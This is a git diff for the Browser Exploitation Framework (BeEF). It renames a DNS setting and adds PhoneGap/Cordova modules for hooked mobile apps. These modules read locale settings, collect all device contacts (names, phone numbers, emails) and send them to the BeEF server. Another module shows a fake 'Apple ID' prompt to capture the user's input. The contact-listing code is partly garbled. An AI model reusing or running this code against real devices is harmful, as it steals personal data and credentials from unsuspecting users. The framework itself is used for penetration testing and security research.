diff --git a/config.yaml b/config.yaml index 7e1a7c3d1..04d0226f1 100644 --- a/config.yaml +++ b/config.yaml @@ -27,7 +27,9 @@ beef: # if running behind a nat set the public ip address here #public: "" #public_port: "" # port setting is experimental - dns: "localhost" + # DNS + dns_host: "localhost" + dns_port: 53 panel_path: "/ui/panel" hook_file: "/hook.js" hook_session_name: "BEEFHOOK" @@ -56,7 +58,7 @@ beef: https: enable: false # In production environments, be sure to use a valid certificate signed for the value - # used in beef.http.dns (the domain name of the server where you run BeEF) + # used in beef.http.dns_host (the domain name of the server where you run BeEF) key: "beef_key.pem" cert: "beef_cert.pem" diff --git a/core/main/client/browser.js b/core/main/client/browser.js index a63859b3b..a82d3df43 100644 --- a/core/main/client/browser.js +++ b/core/main/client/browser.js @@ -1082,8 +1082,9 @@ beef.browser = { */ hasPhonegap:function () { var result = false; + try { - if (!!device.phonegap) result = true; else result = false; + if (!!device.phonegap || !!device.cordova) result = true; else result = false; } catch (e) { result = false; diff --git a/core/main/server.rb b/core/main/server.rb index fc9389042..f9a22a245 100644 --- a/core/main/server.rb +++ b/core/main/server.rb @@ -41,7 +41,8 @@ module BeEF 'beef_port' => @configuration.get('beef.http.port'), 'beef_public' => @configuration.get('beef.http.public'), 'beef_public_port' => @configuration.get('beef.http.public_port'), - 'beef_dns' => @configuration.get('beef.http.dns'), + 'beef_dns_host' => @configuration.get('beef.http.dns_host'), + 'beef_dns_port' => @configuration.get('beef.http.dns_port'), 'beef_hook' => @configuration.get('beef.http.hook_file'), 'beef_proto' => @configuration.get('beef.http.https.enable') == true ? "https" : "http", 'client_debug' => @configuration.get("beef.client.debug") diff --git a/modules/phonegap/phonegap_detect/command.js b/modules/phonegap/phonegap_detect/command.js index ab725a8a8..49b4f55ce 100644 --- a/modules/phonegap/phonegap_detect/command.js +++ b/modules/phonegap/phonegap_detect/command.js @@ -17,7 +17,8 @@ beef.execute(function() { + " cordova api: " + device.cordova + " platform: " + device.platform + " uuid: " + device.uuid - + " version: " + device.version; + + " version: " + device.version + + " model: " + device.model; } catch(e) { phonegap_details = "unable to detect phonegap"; } diff --git a/modules/phonegap/phonegap_globalization_status/command.js b/modules/phonegap/phonegap_globalization_status/command.js new file mode 100644 index 000000000..e5f657b9b --- /dev/null +++ b/modules/phonegap/phonegap_globalization_status/command.js @@ -0,0 +1,34 @@ +// +// Copyright (c) 2006-2013 Wade Alcorn - wade@bindshell.net +// Browser Exploitation Framework (BeEF) - http://beefproject.com +// See the file 'doc/COPYING' for copying permission +// + +// Phonegap_globalization_status +// +beef.execute(function() { + var result = ''; + + navigator.globalization.getPreferredLanguage( + function (language) { + result = 'language: ' + language.value + '\n'; + beef.net.send("<%= @command_url %>", <%= @command_id %>, 'result='+result ); + }, + function () { + result = 'language: ' + 'fail\n'; + beef.net.send("<%= @command_url %>", <%= @command_id %>, 'result='+result ); + } + ); + + navigator.globalization.getLocaleName( + function (locale) { + result = 'locale: ' + locale.value + '\n'; + beef.net.send("<%= @command_url %>", <%= @command_id %>, 'result='+result ); + }, + function () { + result = 'locale: ' + 'fail\n'; + beef.net.send("<%= @command_url %>", <%= @command_id %>, 'result='+result ); + } + ); + +}); \ No newline at end of file diff --git a/modules/phonegap/phonegap_globalization_status/config.yaml b/modules/phonegap/phonegap_globalization_status/config.yaml new file mode 100644 index 000000000..7ced9d85a --- /dev/null +++ b/modules/phonegap/phonegap_globalization_status/config.yaml @@ -0,0 +1,17 @@ +# +# Copyright (c) 2006-2013 Wade Alcorn - wade@bindshell.net +# Browser Exploitation Framework (BeEF) - http://beefproject.com +# See the file 'doc/COPYING' for copying permission +# +# Phonegap_globalization_status +# +beef: + module: + phonegap_globalization_status: + enable: true + category: "Phonegap" + name: "Globalization Status" + description: "Examine device local settings" + authors: ["staregate"] + target: + working: ["All"] diff --git a/modules/phonegap/phonegap_globalization_status/module.rb b/modules/phonegap/phonegap_globalization_status/module.rb new file mode 100644 index 000000000..1bb32a3ae --- /dev/null +++ b/modules/phonegap/phonegap_globalization_status/module.rb @@ -0,0 +1,15 @@ +# +# Copyright (c) 2006-2013 Wade Alcorn - wade@bindshell.net +# Browser Exploitation Framework (BeEF) - http://beefproject.com +# See the file 'doc/COPYING' for copying permission +# +# // Phonegap_globalization_status + +class Phonegap_globalization_status < BeEF::Core::Command + + def post_execute + content = {} + content['Result'] = @datastore['result'] + save content + end +end diff --git a/modules/phonegap/phonegap_list_contacts/command.js b/modules/phonegap/phonegap_list_contacts/command.js new file mode 100644 index 000000000..6587811af --- /dev/null +++ b/modules/phonegap/phonegap_list_contacts/command.js @@ -0,0 +1,43 @@ +// +// Copyright (c) 2006-2013 Wade Alcorn - wade@bindshell.net +// Browser Exploitation Framework (BeEF) - http://beefproject.com +// See the file 'doc/COPYING' for copying permission +// + +// phonegap_list_contacts +// +beef.execute(function() { + var result = ''; + + function onSuccess(contacts) { + + for (var i=0; i", <%= @command_id %>, 'result='+result ); + + } + }; + + function onError(contactError) { + result = 'fail'; + beef.net.send("<%= @command_url %>", <%= @command_id %>, 'result='+result ); + }; + + + var options = new ContactFindOptions(); + options.filter=""; + options.multiple=true; + var fields = ["displayName", "phoneNumbers", "emails"]; + + navigator.contacts.find(fields, onSuccess, onError, options); + +}); \ No newline at end of file diff --git a/modules/phonegap/phonegap_list_contacts/config.yaml b/modules/phonegap/phonegap_list_contacts/config.yaml new file mode 100644 index 000000000..7b4e28cff --- /dev/null +++ b/modules/phonegap/phonegap_list_contacts/config.yaml @@ -0,0 +1,17 @@ +# +# Copyright (c) 2006-2013 Wade Alcorn - wade@bindshell.net +# Browser Exploitation Framework (BeEF) - http://beefproject.com +# See the file 'doc/COPYING' for copying permission +# +# phonegap +# +beef: + module: + phonegap_list_contacts: + enable: true + category: "Phonegap" + name: "List Contacts" + description: "Examine device contacts." + authors: ["staregate"] + target: + working: ["All"] diff --git a/modules/phonegap/phonegap_list_contacts/module.rb b/modules/phonegap/phonegap_list_contacts/module.rb new file mode 100644 index 000000000..e892b491a --- /dev/null +++ b/modules/phonegap/phonegap_list_contacts/module.rb @@ -0,0 +1,15 @@ +# +# Copyright (c) 2006-2013 Wade Alcorn - wade@bindshell.net +# Browser Exploitation Framework (BeEF) - http://beefproject.com +# See the file 'doc/COPYING' for copying permission +# +# // phonegap_list_contacts + +class Phonegap_list_contacts < BeEF::Core::Command + + def post_execute + content = {} + content['Result'] = @datastore['result'] + save content + end +end diff --git a/modules/phonegap/phonegap_prompt_user/command.js b/modules/phonegap/phonegap_prompt_user/command.js new file mode 100644 index 000000000..b539e9b65 --- /dev/null +++ b/modules/phonegap/phonegap_prompt_user/command.js @@ -0,0 +1,29 @@ +// +// Copyright (c) 2006-2013 Wade Alcorn - wade@bindshell.net +// Browser Exploitation Framework (BeEF) - http://beefproject.com +// See the file 'doc/COPYING' for copying permission +// + +// Phonegap_prompt_user +// +beef.execute(function() { + var title = "<%== @title %>"; + var question = "<%== @question %>"; + var ans_yes = "<%== @ans_yes %>"; + var ans_no = "<%== @ans_no %>"; + var result = ''; + + + function onPrompt(results) { + result = "Selected button number " + results.buttonIndex + " result: " + results.input1; + beef.net.send("<%= @command_url %>", <%= @command_id %>, 'result='+result ); + } + + navigator.notification.prompt( + question, + onPrompt, + title, + [ans_yes,ans_no] + ); + +}); diff --git a/modules/phonegap/phonegap_prompt_user/config.yaml b/modules/phonegap/phonegap_prompt_user/config.yaml new file mode 100644 index 000000000..f1e212eae --- /dev/null +++ b/modules/phonegap/phonegap_prompt_user/config.yaml @@ -0,0 +1,17 @@ +# +# Copyright (c) 2006-2013 Wade Alcorn - wade@bindshell.net +# Browser Exploitation Framework (BeEF) - http://beefproject.com +# See the file 'doc/COPYING' for copying permission +# +# Phonegap_prompt_user +# +beef: + module: + phonegap_prompt_user: + enable: true + category: "Phonegap" + name: "Prompt User" + description: "Ask device user a question" + authors: ["staregate"] + target: + working: ["All"] diff --git a/modules/phonegap/phonegap_prompt_user/module.rb b/modules/phonegap/phonegap_prompt_user/module.rb new file mode 100644 index 000000000..2aa3a373e --- /dev/null +++ b/modules/phonegap/phonegap_prompt_user/module.rb @@ -0,0 +1,46 @@ +# +# Copyright (c) 2006-2013 Wade Alcorn - wade@bindshell.net +# Browser Exploitation Framework (BeEF) - http://beefproject.com +# See the file 'doc/COPYING' for copying permission +# +# Phonegap_prompt_user +# + +class Phonegap_prompt_user < BeEF::Core::Command + + def self.options + return [{ + 'name' => 'title', + 'description' => 'Prompt title', + 'ui_label'=>'Title', + 'value' => 'Apple ID', + 'width' => '300px' + + },{ + 'name' => 'question', + 'description' => 'Prompt question', + 'ui_label'=>'Question', + 'value' => 'Please enter your Apple ID', + 'width' => '300px' + },{ + 'name' => 'ans_yes', + 'description' => 'Prompt positive answer button label', + 'ui_label'=>'Yes', + 'value' => 'Submit', + 'width' => '100px' + },{ + 'name' => 'ans_no', + 'description' => 'Prompt negative answer button label', + 'ui_label'=>'No', + 'value' => 'Cancel', + 'width' => '100px' + }] + end + + def callback + content = {} + content['Result'] = @datastore['result'] + save content + end + +end